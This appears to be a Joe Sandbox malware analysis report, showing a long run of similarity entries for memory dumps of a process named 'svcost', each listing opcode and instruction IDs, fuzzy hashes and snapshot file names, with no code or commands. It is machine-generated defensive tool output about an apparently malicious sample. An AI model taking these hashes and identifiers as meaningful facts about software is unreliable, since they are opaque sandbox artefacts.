                                                                                            • Opcode ID: 2948d333f775fd34835d3f3ee274b577d1739d795bad672fa90d7d446acf52e9
                                                                                            • Instruction ID: dc8a4c36ad28c3f8b03d34d8ae49c9f6c57455e3c900f80e788902c56cfbf327
                                                                                            • Opcode Fuzzy Hash: 2948d333f775fd34835d3f3ee274b577d1739d795bad672fa90d7d446acf52e9
                                                                                            • Instruction Fuzzy Hash: B8118C36A05214DFCB15CF64E968C99BBF6FF49311B1044BAE845A7351CB32DD11CB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: abf819cc56672cf681b861e92443ed35e8cfd7ac845a971f499a1214dcbc4804
                                                                                            • Instruction ID: b793557a1494d8c99dfcceb64728869ea8b04cd2468c369fec327c0229396468
                                                                                            • Opcode Fuzzy Hash: abf819cc56672cf681b861e92443ed35e8cfd7ac845a971f499a1214dcbc4804
                                                                                            • Instruction Fuzzy Hash: EE01B1326142986FD754DAADE440BDAFFF9EB65364F2880BBE484D7250E731D980C760
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57a784135cb74bb82654fda63cf31bafcd56abc3849d8eea8645c06919057c1c
                                                                                            • Instruction ID: 35fb01b56b57ef7619b423b3d6b239763b4cfff49e7d616415d21e590d9a6b90
                                                                                            • Opcode Fuzzy Hash: 57a784135cb74bb82654fda63cf31bafcd56abc3849d8eea8645c06919057c1c
                                                                                            • Instruction Fuzzy Hash: 9F014876340315AFD7108F59DC94FAA77ADFB89721F108066FA15DB291CB71D811C790
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e98f3b420a7e48ca02fe9d7831fb7f929862faf71bf64d2d686a3caabd37ec06
                                                                                            • Instruction ID: 78f78e2a18576a4f89ad872d7953a1b5eb5fd143f7ffcb0e93b71aa88ab6bbe7
                                                                                            • Opcode Fuzzy Hash: e98f3b420a7e48ca02fe9d7831fb7f929862faf71bf64d2d686a3caabd37ec06
                                                                                            • Instruction Fuzzy Hash: 4B01B130A09208EFDF05DFA4DA10AADBF75EF47315F1041EAC845972A2CB324A56DF82
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a45937dfb77296720c404c8435f788ce24975d6539fb7bca595f495aaf153fd9
                                                                                            • Instruction ID: f32f09f195ae179b8837fc590a8e3873bd3b404c229f3cb50d6dfcd35bc81e7d
                                                                                            • Opcode Fuzzy Hash: a45937dfb77296720c404c8435f788ce24975d6539fb7bca595f495aaf153fd9
                                                                                            • Instruction Fuzzy Hash: 5C11E2B0E002099FDB48DFA9C8517BFBBF1EF89300F20846A9418A7354DB309A018B91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2046be21772f632203912a8efe25c507d43d52f659e1216f55df6b703863106
                                                                                            • Instruction ID: f3df443f044d41a30ae94ffb9cda097475a29d8c64128d81c4d7a0a60c782b36
                                                                                            • Opcode Fuzzy Hash: b2046be21772f632203912a8efe25c507d43d52f659e1216f55df6b703863106
                                                                                            • Instruction Fuzzy Hash: 02018472D0070A8BDB049BF5D8014EEBB72EFC6321F154725D505771A0EBB0258ECBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 26202c38818a95521b9ac0ec7e121f097ac57bdb9a259f4f148854d1bd69ae5a
                                                                                            • Instruction ID: 1c273dc9c8cc2254e43e1d3799b9a1f1e0578079e0721e2a6ea796255ccd6861
                                                                                            • Opcode Fuzzy Hash: 26202c38818a95521b9ac0ec7e121f097ac57bdb9a259f4f148854d1bd69ae5a
                                                                                            • Instruction Fuzzy Hash: A7F0AF713000108FC7049A19D894A2AF7DAFBC9754B208075E609CB366CA26EC018790
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 266f204bb2ef189d40640cc4621c4bf1d9a3ab887c7b3a5c3b01678c7c40c870
                                                                                            • Instruction ID: 6576d871311c818e21993d168aff44e5ed1efc4451c89100019c1fd3d20d068e
                                                                                            • Opcode Fuzzy Hash: 266f204bb2ef189d40640cc4621c4bf1d9a3ab887c7b3a5c3b01678c7c40c870
                                                                                            • Instruction Fuzzy Hash: 31F02871B09361AFE31587649C20B16BBF9EF8A320F0540BAD5499B392CB62AC00C390
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac77acc3e508c40dd162f74abe51e758b2610ef4738847311c96ff47702604ca
                                                                                            • Instruction ID: ff4cb68601d61ea1348a90a458a26d176642ad250e0ecb4c329e7b01152ae3c0
                                                                                            • Opcode Fuzzy Hash: ac77acc3e508c40dd162f74abe51e758b2610ef4738847311c96ff47702604ca
                                                                                            • Instruction Fuzzy Hash: 40014B70D45208DFCB04DFA8D9556EDBBB5EF49304F1045AAD819E3650E7395A40CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf5632d496d71956a07ff9f3415cf557789b076886e89955e5a78fb33b5fe0cb
                                                                                            • Instruction ID: 208732260d018133499ff56b2053b2a78016949a77c56846fda01f568e00066e
                                                                                            • Opcode Fuzzy Hash: bf5632d496d71956a07ff9f3415cf557789b076886e89955e5a78fb33b5fe0cb
                                                                                            • Instruction Fuzzy Hash: 78017C3180424AEFCF02DF94D8508EDBF75FF8A310F04C14AE95467621D735A666CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7462487a168545172d438ff1e546b43ce164232364cf5f58abf63f5928fe9186
                                                                                            • Instruction ID: fa7e3ea370332d356fa06692d1476ea39725218c456b346c56f6a5abbbf31730
                                                                                            • Opcode Fuzzy Hash: 7462487a168545172d438ff1e546b43ce164232364cf5f58abf63f5928fe9186
                                                                                            • Instruction Fuzzy Hash: 4101A77080E3C59FCF12CBB4DA61568BFB9DF43204F1845DBC4909BA93D5349A1ACB12
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd3193be62e7529fbf76b41fd00e61a614bff9550373f409a2829cc0fa8ac79e
                                                                                            • Instruction ID: 3d85a55090aeba346be95be01b9cf878d1a7b7104d96492ec433da1d8266d52b
                                                                                            • Opcode Fuzzy Hash: cd3193be62e7529fbf76b41fd00e61a614bff9550373f409a2829cc0fa8ac79e
                                                                                            • Instruction Fuzzy Hash: 5CF02836B041485FCB158668C854AAEBFA6EFD4210F08816FED0597761DF319C06C780
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82b56b4309e4ec8b6ab7b9594efd335b6088d5bb59a7f86eb0a5e746d402c92a
                                                                                            • Instruction ID: 2d7603cc7c04cc86bce7e9e4535e1cd45dc0fec340c9d574d7ed4ecdb8a96590
                                                                                            • Opcode Fuzzy Hash: 82b56b4309e4ec8b6ab7b9594efd335b6088d5bb59a7f86eb0a5e746d402c92a
                                                                                            • Instruction Fuzzy Hash: B7F024A2B0D7918FE31203741C20325BBE5CBC7201F1841BBC1869F3E2DA869802C350
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba19b41c448bba7e159c0270b51f95fe0daa22e69a96a7ffa86c75fde73b2ad7
                                                                                            • Instruction ID: 1477b620a23ee73ae1bb13dacf0349e8bc8c715e548fab04f9b43ce084b7fcc9
                                                                                            • Opcode Fuzzy Hash: ba19b41c448bba7e159c0270b51f95fe0daa22e69a96a7ffa86c75fde73b2ad7
                                                                                            • Instruction Fuzzy Hash: 16F028319042889BDB05D770C8659FFBFBA4B85300F05856BD002AB282DEB41406C3C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b61408c1696fccbf8d49569f0a065cc6daea97c7685c389aeb3683679d890cc2
                                                                                            • Instruction ID: 6337380babd58750aeea6aa84a93bda787c73c6aa3f1bae8bd8b54cb276ba678
                                                                                            • Opcode Fuzzy Hash: b61408c1696fccbf8d49569f0a065cc6daea97c7685c389aeb3683679d890cc2
                                                                                            • Instruction Fuzzy Hash: 15F0E972B047119FE71486599C10B2BF7E9EBC9720F144039D506AB390CF72AC4183D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2155c2826bfc91ca0e542c85c17de05cf1f17848a056adab78da8aa35e7f61e
                                                                                            • Instruction ID: 8563a7cf62b5e4ac25da74cb2aef6d80cbcf76f525c0ea90a292378d9b734b41
                                                                                            • Opcode Fuzzy Hash: b2155c2826bfc91ca0e542c85c17de05cf1f17848a056adab78da8aa35e7f61e
                                                                                            • Instruction Fuzzy Hash: A4F09A363043489FC7058F2AD894C5A7BB9FF8A62430580BAF909CB322CA61D805CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a613e357ae9f044796ae3a8e044cf63b560a9638442c878819a8541ba38cb92
                                                                                            • Instruction ID: e93817de33c3ccff3f27acfc44a8c7105b212593e9081537d04bc472f7377b87
                                                                                            • Opcode Fuzzy Hash: 7a613e357ae9f044796ae3a8e044cf63b560a9638442c878819a8541ba38cb92
                                                                                            • Instruction Fuzzy Hash: 53F05E74C0D384AFCB01CBA4C9609ACBFB0EB4B210F1882EFC89597252C6365A46DF52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction ID: 0d05caa06999c543ec192fa1af804f56228de4b5967c6f37e8394b394fb5a842
                                                                                            • Opcode Fuzzy Hash: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction Fuzzy Hash: 39E039B4D04208EFCB44DFA8C550A9DBBB4EB48304F10C0AA9C1893300D7319A42CF41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction ID: 1551749b3de0b84562aabef243e62a827610b3ccdfb9f9d5801159eec0f78653
                                                                                            • Opcode Fuzzy Hash: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction Fuzzy Hash: B9E0C974E05208EFCB44DFA9D550A9DBBB5EB49304F10C1AADC1893350D6319A52DF85
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction ID: a65abaa4b2268f0cead24e0782712fa065f1010178148eba567023305f7b13c5
                                                                                            • Opcode Fuzzy Hash: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction Fuzzy Hash: A6E03974E05208EFCB44DFA8C550ADDBBF5EB88300F10C0AA9C1893300D6319A42CF40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 861ef41d644bf280404ecae79e3c9183c1a4b278fd8afe395d3ff54eb74ef7c6
                                                                                            • Instruction ID: d5451c229242447f435723c296b0c5ddccdf3cc82db92343a62604412b215b23
                                                                                            • Opcode Fuzzy Hash: 861ef41d644bf280404ecae79e3c9183c1a4b278fd8afe395d3ff54eb74ef7c6
                                                                                            • Instruction Fuzzy Hash: 1EE0E539905208EBCF05DFD4D950EADBBBAFB49304F108199EC0527761C7329A62EF96
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5ff89a22ce81d3524b048594cc1fbc41495997213b1c932b27cacc30920eddc3
                                                                                            • Instruction ID: 5f6a557228e27a8a5192640420c2bb4b9d5263d9844e698e7370b85e43cc2677
                                                                                            • Opcode Fuzzy Hash: 5ff89a22ce81d3524b048594cc1fbc41495997213b1c932b27cacc30920eddc3
                                                                                            • Instruction Fuzzy Hash: A5F0393480420CEFCB04CF94D910AACBBB9EB49310F10C0A9EC1852350C6329A62EF80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 88cfe5367c107a0e0444e0d3ed83d19376386965d7f996a0955f95ab91fa6539
                                                                                            • Instruction ID: ad64dd53bfb28003bd1278ce64fdf29bcd478d82726a87931520c6080482ce72
                                                                                            • Opcode Fuzzy Hash: 88cfe5367c107a0e0444e0d3ed83d19376386965d7f996a0955f95ab91fa6539
                                                                                            • Instruction Fuzzy Hash: 7DF06D38905208AFCB04DFA8D560BBCFBB8EB49305F18C0EDD85857752DA319A42CF51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f234154bc9e6de7f2611305feb962d71b97bafad28a360b4c1924240f30ba36e
                                                                                            • Instruction ID: f0a66e4c5ab15ea8d961b818e72e290e5bc2f398b1fbbf1774381858043ae93b
                                                                                            • Opcode Fuzzy Hash: f234154bc9e6de7f2611305feb962d71b97bafad28a360b4c1924240f30ba36e
                                                                                            • Instruction Fuzzy Hash: 02E0CD313013149BE7246674483176A33D9DF85751F104075DA059F7C0DE71D801CF61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: def8b5938f169a121f128059a5d94126ee09085bf61141bba21386755274fd23
                                                                                            • Instruction ID: 490962ce4e8b73322411cad5a8180f7690171a23aa05b7b262fb12b6c0eb8135
                                                                                            • Opcode Fuzzy Hash: def8b5938f169a121f128059a5d94126ee09085bf61141bba21386755274fd23
                                                                                            • Instruction Fuzzy Hash: A9F0AF74909208CFDB18DF69D8A8A9CFBF2FF49310F1481AAD009A7255E7349982CF04
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e83e4eecbfc3714b0bdcb07e4dd3912601f9f0da37936df795f9e3920e9b1040
                                                                                            • Instruction ID: 58f24489f9322b17c1a99a9ced3b6074dba84be168b0dcd04ab3cc9a18dcd301
                                                                                            • Opcode Fuzzy Hash: e83e4eecbfc3714b0bdcb07e4dd3912601f9f0da37936df795f9e3920e9b1040
